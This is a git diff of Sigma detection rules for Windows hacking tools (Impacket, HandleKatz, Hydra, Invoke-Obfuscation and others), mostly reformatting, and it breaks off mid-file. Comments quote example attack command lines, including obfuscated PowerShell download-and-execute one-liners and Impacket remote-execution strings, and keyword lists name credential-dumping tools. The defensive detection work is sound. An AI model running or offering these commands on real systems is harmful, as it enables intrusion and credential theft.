a/sigma/builtin/process_creation/proc_creation_win_hktl_gmer.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_gmer.yml index 982b4995f..528d94bd6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_gmer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_gmer.yml @@ -17,16 +17,16 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \gmer.exe + NewProcessName|endswith: \gmer.exe selection_sysmon_hash: Hashes|contains: - MD5=E9DC058440D321AA17D0600B3CA0AB04 - SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57 - SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173 selection_other: - - md5: e9dc058440d321aa17d0600b3ca0ab04 - - sha1: 539c228b6b332f5aa523e5ce358c16647d8bbe57 - - sha256: e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173 + - md5: e9dc058440d321aa17d0600b3ca0ab04 + - sha1: 539c228b6b332f5aa523e5ce358c16647d8bbe57 + - sha256: e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173 condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml index fed8cd75c..6cb265b3f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_handlekatz.yml @@ -1,8 +1,7 @@ title: HackTool - HandleKatz LSASS Dumper Execution id: ca621ba5-54ab-4035-9942-d378e6fcde3c status: test -description: Detects the use of HandleKatz, a tool that demonstrates the usage of - cloned handles to Lsass in order to create an obfuscated memory dump of the same +description: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same references: - https://github.com/codewhitesec/HandleKatz author: Florian Roth (Nextron Systems) @@ -19,20 +18,20 @@ detection: EventID: 4688 Channel: Security selection_loader_img: - CommandLine|contains: '--pid:' - NewProcessName|endswith: \loader.exe + CommandLine|contains: '--pid:' + NewProcessName|endswith: \loader.exe selection_loader_imphash: - - Imphash: - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - Hashes: - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 + - Imphash: + - 38d9e015591bbfd4929e0d0f47fa0055 + - 0e2216679ca6e1094d63322e3412d650 + - Hashes: + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 + - IMPHASH=0E2216679CA6E1094D63322E3412D650 selection_flags: - CommandLine|contains|all: + CommandLine|contains|all: - '--pid:' - '--outfile:' - CommandLine|contains: + CommandLine|contains: - .dmp - lsass - .obf diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_hashcat.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_hashcat.yml index a6380d32c..292cc3b6f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_hashcat.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_hashcat.yml @@ -1,8 +1,7 @@ title: HackTool - Hashcat Password Cracker Execution id: 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf status: test -description: Execute Hashcat.exe with provided SAM file from registry of Windows and - Password list to crack against +description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat - https://hashcat.net/wiki/doku.php?id=hashcat @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \hashcat.exe + NewProcessName|endswith: \hashcat.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '-a ' - '-m 1000 ' - '-r ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml index 4b93f3b3b..22a771cef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml @@ -1,8 +1,7 @@ title: HackTool - Htran/NATBypass Execution id: f5e3b62f-e577-4e59-931e-0a15b2b94e1e status: test -description: Detects executable names or flags used by Htran or Htran-like tools (e.g. - NATBypass) +description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) references: - https://github.com/HiwinCN/HTran - https://github.com/cw1997/NATBypass @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \htran.exe - \lcx.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '.exe -tran ' - '.exe -slave ' condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_hydra.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_hydra.yml index eece55fd3..96cbacfd3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_hydra.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_hydra.yml @@ -1,8 +1,7 @@ title: HackTool - Hydra Password Bruteforce Execution id: aaafa146-074c-11eb-adc1-0242ac120002 status: test -description: Detects command line parameters used by Hydra password guessing hack - tool +description: Detects command line parameters used by Hydra password guessing hack tool references: - https://github.com/vanhauser-thc/thc-hydra author: Vasiliy Burov @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-u ' - '-p ' - CommandLine|contains: + CommandLine|contains: - ^USER^ - ^PASS^ condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml index 74fbb413c..a7e87dbfb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml @@ -1,8 +1,8 @@ title: HackTool - Potential Impacket Lateral Movement Activity id: 10c14723-61c7-4c75-92ca-9af245723ad2 related: - - id: e31f89f7-36fb-4697-8ab6-48823708353b - type: obsoletes + - id: e31f89f7-36fb-4697-8ab6-48823708353b + type: obsoletes status: stable description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework references: @@ -27,22 +27,40 @@ detection: EventID: 4688 Channel: Security selection_other: - CommandLine|contains|all: + # *** wmiexec.py + # parent is wmiprvse.exe + # examples: + # cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 + # cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 + # *** dcomexec.py -object MMC20 + # parent is mmc.exe + # example: + # "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567442499.05 2>&1 + # *** dcomexec.py -object ShellBrowserWindow + # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe + # example: + # "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1567520103.71 2>&1 + # *** smbexec.py + # parent is services.exe + # example: + # C:\Windows\system32\cmd.exe /Q /c echo tasklist ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat + CommandLine|contains|all: - cmd.exe - /Q - /c - \\\\127.0.0.1\\ - '&1' ParentProcessName|endswith: - - \wmiprvse.exe - - \mmc.exe - - \explorer.exe - - \services.exe + - \wmiprvse.exe # wmiexec + - \mmc.exe # dcomexec MMC + - \explorer.exe # dcomexec ShellBrowserWindow + - \services.exe # smbexec selection_atexec: ParentCommandLine|contains: - - svchost.exe -k netsvcs - - taskeng.exe - CommandLine|contains|all: + - svchost.exe -k netsvcs # atexec on win10 (parent is "C:\Windows\system32\svchost.exe -k netsvcs") + - taskeng.exe # atexec on win7 (parent is "taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\System:Service:") + # cmd.exe /C tasklist /m > C:\Windows\Temp\bAJrYQtL.tmp 2>&1 + CommandLine|contains|all: - cmd.exe - /C - Windows\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml index 817c32347..81e69e131 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_impacket_tools.yml @@ -1,8 +1,7 @@ title: HackTool - Impacket Tools Execution id: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 status: test -description: Detects the execution of different compiled Windows binaries of the impacket - toolset (based on names or part of their names - could lead to false positives) +description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) references: - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries author: Florian Roth (Nextron Systems) @@ -19,43 +18,58 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|contains: - - \goldenPac - - \karmaSMB - - \kintercept - - \ntlmrelayx - - \rpcdump - - \samrdump - - \secretsdump - - \smbexec - - \smbrelayx - - \wmiexec - - \wmipersist - - NewProcessName|endswith: - - \atexec_windows.exe - - \dcomexec_windows.exe - - \dpapi_windows.exe - - \findDelegation_windows.exe - - \GetADUsers_windows.exe - - \GetNPUsers_windows.exe - - \getPac_windows.exe - - \getST_windows.exe - - \getTGT_windows.exe - - \GetUserSPNs_windows.exe - - \ifmap_windows.exe - - \mimikatz_windows.exe - - \netview_windows.exe - - \nmapAnswerMachine_windows.exe - - \opdump_windows.exe - - \psexec_windows.exe - - \rdp_check_windows.exe - - \sambaPipe_windows.exe - - \smbclient_windows.exe - - \smbserver_windows.exe - - \sniff_windows.exe - - \sniffer_windows.exe - - \split_windows.exe - - \ticketer_windows.exe + - NewProcessName|contains: + - \goldenPac + - \karmaSMB + - \kintercept + - \ntlmrelayx + - \rpcdump + - \samrdump + - \secretsdump + - \smbexec + - \smbrelayx + - \wmiexec + - \wmipersist + - NewProcessName|endswith: + - \atexec_windows.exe + - \dcomexec_windows.exe + - \dpapi_windows.exe + - \findDelegation_windows.exe + - \GetADUsers_windows.exe + - \GetNPUsers_windows.exe + - \getPac_windows.exe + - \getST_windows.exe + - \getTGT_windows.exe + - \GetUserSPNs_windows.exe + - \ifmap_windows.exe + - \mimikatz_windows.exe + - \netview_windows.exe + - \nmapAnswerMachine_windows.exe + - \opdump_windows.exe + - \psexec_windows.exe + - \rdp_check_windows.exe + - \sambaPipe_windows.exe + - \smbclient_windows.exe + - \smbserver_windows.exe + - \sniff_windows.exe + - \sniffer_windows.exe + - \split_windows.exe + - \ticketer_windows.exe + # - '\addcomputer_windows.exe' + # - '\esentutl_windows.exe' + # - '\getArch_windows.exe' + # - '\lookupsid_windows.exe' + # - '\mqtt_check_windows.exe' + # - '\mssqlclient_windows.exe' + # - '\mssqlinstance_windows.exe' + # - '\ntfs-read_windows.exe' + # - '\ping_windows.exe' + # - '\ping6_windows.exe' + # - '\raiseChild_windows.exe' + # - '\reg_windows.exe' + # - '\registry-read_windows.exe' + # - '\services_windows.exe' + # - '\wmiquery_windows.exe' condition: process_creation and selection falsepositives: - Legitimate use of the impacket tools diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_impersonate.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_impersonate.yml index 39bf35892..9d65240a6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_impersonate.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_impersonate.yml @@ -1,8 +1,7 @@ title: HackTool - Impersonate Execution id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 status: test -description: Detects execution of the Impersonate tool. Which can be used to manipulate - tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively references: - https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/ - https://github.com/sensepost/impersonate @@ -22,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection_commandline_exe: - CommandLine|contains: impersonate.exe + CommandLine|contains: impersonate.exe selection_commandline_opt: - CommandLine|contains: + CommandLine|contains: - ' list ' - ' exec ' - ' adduser ' @@ -34,9 +33,9 @@ detection: - SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A - IMPHASH=0A358FFC1697B7A07D0E817AC740DF62 selection_hash_ext: - - md5: 9520714AB576B0ED01D1513691377D01 - - sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A - - Imphash: 0A358FFC1697B7A07D0E817AC740DF62 + - md5: 9520714AB576B0ED01D1513691377D01 + - sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A + - Imphash: 0A358FFC1697B7A07D0E817AC740DF62 condition: process_creation and (all of selection_commandline_* or 1 of selection_hash_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_inveigh.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_inveigh.yml index c6b727c6d..0240720f6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_inveigh.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_inveigh.yml @@ -1,8 +1,7 @@ title: HackTool - Inveigh Execution id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0 status: test -description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle - tool +description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool references: - https://github.com/Kevin-Robertson/Inveigh - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ @@ -20,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \Inveigh.exe - - OriginalFileName: - - \Inveigh.exe - - \Inveigh.dll - - Description: Inveigh - - CommandLine|contains: - - ' -SpooferIP' - - ' -ReplyToIPs ' - - ' -ReplyToDomains ' - - ' -ReplyToMACs ' - - ' -SnifferIP' + - NewProcessName|endswith: \Inveigh.exe + - OriginalFileName: + - \Inveigh.exe + - \Inveigh.dll + - Description: Inveigh + - CommandLine|contains: + - ' -SpooferIP' + - ' -ReplyToIPs ' + - ' -ReplyToDomains ' + - ' -ReplyToMACs ' + - ' -SnifferIP' condition: process_creation and selection falsepositives: - Very unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml index ea239500b..b3d7423d3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml @@ -3,7 +3,7 @@ id: b222df08-0e07-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/11/17 @@ -20,12 +20,15 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + # Example 1: Cmd /c" echo/Invoke-Expression (New-Object Net.WebClient).DownloadString |cLiP&& POWerSheLl -Nolog -sT . (\"{1}{2}{0}\"-f'pe','Ad',(\"{1}{0}\" -f'Ty','d-' ) ) -Assemb ( \"{5}{1}{3}{0}{2}{4}\" -f'ows','y','.F',(\"{0}{1}{2}\" -f'stem.W','i','nd'),( \"{0}{1}\"-f 'o','rms' ),'S' ) ; ([SySTEM.wiNDows.FoRmS.CLiPbOArd]::( \"{1}{0}\" -f (\"{1}{0}\" -f'T','TTeX' ),'gE' ).\"invO`Ke\"( ) ) ^| ^&( \"{5}{1}{2}{4}{3}{0}\" -f 'n',( \"{1}{0}\"-f'KE-','o' ),(\"{2}{1}{0}\"-f 'pRESS','x','e' ),'o','i','iNV') ; [System.Windows.Forms.Clipboard]::(\"{0}{1}\" -f( \"{1}{0}\"-f'e','SetT' ),'xt').\"InV`oKe\"( ' ')" + # Example 2: CMD/c " ECho Invoke-Expression (New-Object Net.WebClient).DownloadString|c:\WiNDowS\SySteM32\cLip && powershElL -noPRO -sTa ^& (\"{2}{0}{1}\" -f 'dd',(\"{1}{0}\"-f 'ype','-T' ),'A' ) -AssemblyN (\"{0}{3}{2}{1}{4}\"-f'Pr','nCo',(\"{0}{1}\"-f'e','ntatio'),'es','re' ) ; ^& ( ( [StRinG]${ve`RB`OSE`pr`e`FeReNCE} )[1,3] + 'x'-JoiN'') ( ( [sySTem.WInDOWs.ClipbOaRD]::( \"{1}{0}\" -f(\"{0}{1}\" -f'tTe','xt' ),'ge' ).\"IN`Vo`Ke\"( ) ) ) ; [System.Windows.Clipboard]::( \"{2}{1}{0}\" -f't',( \"{0}{1}\" -f 'tT','ex' ),'Se' ).\"In`V`oKe\"( ' ' )" + CommandLine|contains|all: - cmd - '&&' - 'clipboard]::' - -f - CommandLine|contains: + CommandLine|contains: - /c - /r condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml index 7752cae3b..f04c47fbb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml @@ -1,8 +1,7 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation id: 4bf943c6-5146-4273-98dd-e958fd1e3abf status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the following code block +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - CommandLine|re: \*mdr\*\W\s*\)\.Name - - CommandLine|re: \$VerbosePreference\.ToString\( - - CommandLine|re: \[String\]\s*\$VerbosePreference + - CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - CommandLine|re: \*mdr\*\W\s*\)\.Name + - CommandLine|re: \$VerbosePreference\.ToString\( + - CommandLine|re: \[String\]\s*\$VerbosePreference condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml index a2364f8c3..d65678ce1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml @@ -3,7 +3,7 @@ id: 6c96fc76-0eb1-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/17 @@ -20,17 +20,20 @@ detection: EventID: 4688 Channel: Security selection_main: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' + # Example 1: c:\windows\sYstEm32\CmD.eXE /C"echO\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -" + # Example 2: c:\WiNDOws\sysTEm32\cmd.EXe /C " ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )" + CommandLine|contains|all: - cmd - powershell - CommandLine|contains: + CommandLine|contains: - /c - /r selection_other: - - CommandLine|contains: noexit - - CommandLine|contains|all: - - input - - $ + - CommandLine|contains: noexit + - CommandLine|contains|all: + - input + - $ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml index be85f0598..c4a06ef10 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml @@ -3,7 +3,7 @@ id: 27aec9c9-dbb0-4939-8422-1742242471d0 status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/17 @@ -20,11 +20,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + # Example 1: C:\winDoWs\SySTeM32\cmd.Exe /C"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\"{2}{3}{0}{1}\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\"IN`VO`KecOmMaND\".\"inVo`KES`crIPt\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\"{1}{4}{2}{3}{0}\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \"{0}{1}\"-f'n','oti' ),( \"{0}{1}\" -f'pRoC','esS') )) )" + # Example 2: cMD.exe /C "seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\"{1}{0}{2}{3}\" -f 'eT-vaR','G','iab','lE' ) (\"{0}{1}\" -f '*m','DR*' ) ).\"na`ME\"[3,11,2]-JOIN'' ) ( ( ^&(\"{0}{1}\" -f'g','CI' ) (\"{0}{1}\" -f 'ENV',':SlDb' ) ).\"VA`luE\" ) " + CommandLine|contains|all: - cmd - '"set' - -f - CommandLine|contains: + CommandLine|contains: - /c - /r condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml index 061acae85..0b7eb6e71 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml @@ -3,7 +3,7 @@ id: 7eedcc9d-9fdb-4d94-9c54-474e8affc0c7 status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/12/29 @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - new-object - text.encoding]::ascii - CommandLine|contains: + CommandLine|contains: - system.io.compression.deflatestream - system.io.streamreader - readtoend( diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml index 2e27034ef..9b3e877b5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml @@ -3,7 +3,7 @@ id: 9c14c9fa-1a63-4a64-8e57-d19280559490 status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/16 @@ -20,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"' + CommandLine|contains|all: - set - '&&' - CommandLine|contains: + CommandLine|contains: - environment - invoke - input diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml index 4f538c7ca..2b7fe3e33 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml @@ -3,7 +3,7 @@ id: e1561947-b4e3-4a74-9bdd-83baed21bdb5 status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/16 @@ -20,11 +20,14 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*' + # Example 1: C:\WINdoWS\sySteM32\CMd /c " ECho\Invoke-Expression (New-Object Net.WebClient).DownloadString|Clip.Exe&&C:\WINdoWS\sySteM32\CMd /c pOWerSheLl -STa . ( \"{2}{0}{1}\"-f'dd-',(\"{0}{1}\" -f 'T','ype' ),'A' ) -Assembly ( \"{4}{1}{3}{0}{2}\"-f (\"{0}{1}\" -f 'nd','ow'),( \"{1}{0}\"-f'.W','stem' ),( \"{2}{1}{0}\" -f 'rms','Fo','s.'),'i','Sy') ; ${exeCUtIOnCONTeXT}.\"INV`oKECOM`m`ANd\".\"INV`ok`ESCriPT\"( ( [sYSteM.wiNDoWS.forMs.ClIPboaRD]::( \"{2}{0}{1}\" -f'Ex','t',(\"{0}{1}\" -f'Get','t' ) ).\"iNvo`Ke\"( )) ) ; [System.Windows.Forms.Clipboard]::(\"{1}{0}\" -f 'ar','Cle' ).\"in`V`oKE\"( )" + # Example 2: C:\WINDowS\sYsTEM32\CmD.eXE /C" echo\Invoke-Expression (New-Object Net.WebClient).DownloadString| C:\WIndOWs\SYSteM32\CLip &&C:\WINDowS\sYsTEM32\CmD.eXE /C POWERSHeLL -sT -noL [Void][System.Reflection.Assembly]::( \"{0}{3}{4}{1}{2}\" -f( \"{0}{1}\"-f'Lo','adW' ),( \"{0}{1}\"-f 'Par','t'),( \"{0}{1}{2}\"-f 'ial','N','ame'),'it','h' ).\"in`VO`KE\"( ( \"{3}{1}{4}{5}{2}{0}\"-f'rms','ystem.Windo','Fo','S','w','s.' )) ; ( [wIndows.fOrms.cLIPBOArD]::( \"{1}{0}\"-f'T',( \"{1}{0}\" -f'tEX','gET' )).\"i`Nvoke\"( ) ) ^^^| ^^^& ( ( ^^^& ( \"{2}{1}{0}\"-f 'e',( \"{2}{1}{0}\"-f'IABl','aR','v' ),( \"{0}{1}\"-f'Get','-' ) ) ( \"{1}{0}\"-f'*','*MDr' )).\"n`Ame\"[3,11,2]-jOin'') ; [Windows.Forms.Clipboard]::( \"{0}{1}\" -f (\"{1}{0}\"-f'tT','Se' ),'ext').\"in`VoKe\"(' ' )" + CommandLine|contains|all: - echo - clip - '&&' - CommandLine|contains: + CommandLine|contains: - clipboard - invoke - i` diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml index 83d4d23b4..79473f46b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml @@ -3,7 +3,7 @@ id: ac20ae82-8758-4f38-958e-b44a3140ca88 status: test 